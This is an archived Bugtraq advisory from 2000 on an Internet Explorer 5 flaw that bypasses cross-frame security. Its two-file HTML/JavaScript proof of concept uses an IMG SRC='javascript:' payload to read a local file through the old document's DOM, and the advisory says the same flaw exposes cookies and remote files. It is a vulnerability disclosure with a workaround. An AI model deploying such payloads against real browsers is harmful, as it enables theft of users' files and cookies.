Bugtraq mailing list archives
IE 5 security vulnerablity - circumventing Cross-frame security policy and accessing the DOM of "old" documents.
From: joro () NAT BG (Georgi Guninski)
Date: Fri, 7 Jan 2000 16:32:22 +0200
Georgi Guninski security advisory #4, 2000
IE 5 security vulnerablity - circumventing Cross-frame security policy
and accessing the DOM of "old" documents.
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.01 under Windows 95 and 5.5 under WinNT 4.0 (suppose
other versions are also vulnerable)
allows circumventing "Cross frame security policy" by accessing the DOM
of "old" documents using <IMG SRC="javascript:..."> and a design flaw in
IE.
This exposes the whole DOM of the target document and opens lots of
security risks.
This allows reading local files, reading files from any host, window
spoofing, getting cookies, etc.
Details:
This is a strange exploit. If you open a new document in a window that
contains an old document, the old
document's DOM may be accessed by the new document until the new
document is completely parsed and displayed.
Looks like IE keeps the old document until the new document is finally
parsed and displayed.
If you put a <IMG SRC="javascript:..."> in the new document, it has
access to the old document's DOM.
Examine the source code for more info:
The code is:
-----------------img2main.html---------------------------------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and
shown in a message box");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
</SCRIPT>
---------------------------------------------------------------------
----------------img2.html--------------------------------------------
<HTML>
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your
file: \'+opener.document.body.innerText)');alert('Just an alert, but
is necessary. Wait a little.')">
</HTML>
---------------------------------------------------------------------
Demonstration is available at: http://www.nat.bg/~joro/img2main.html
Workaround: Disable Active Scripting
Regards,
Georgi Guninski
http://www.nat.bg/~joro
Current thread:
- Re: irix-soundplayer.sh pda () ING PUC CL (Jan 04)
- Re: irix-soundplayer.sh Dale Southard (Jan 04)
- Re: irix-soundplayer.sh Darren Reed (Jan 04)
- L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper Dildog (Jan 04)
- Re: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper cogNiTioN (Jan 05)
- Re: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper gwynp () ARTWARE QC CA (Jan 05)
- IE 5 security vulnerablity - circumventing Cross-frame security policy and accessing the DOM of "old" documents. Georgi Guninski (Jan 07)
- Re: L0pht Advisory: RH Linux 6.0/6.1, PAM and userhelper cogNiTioN (Jan 05)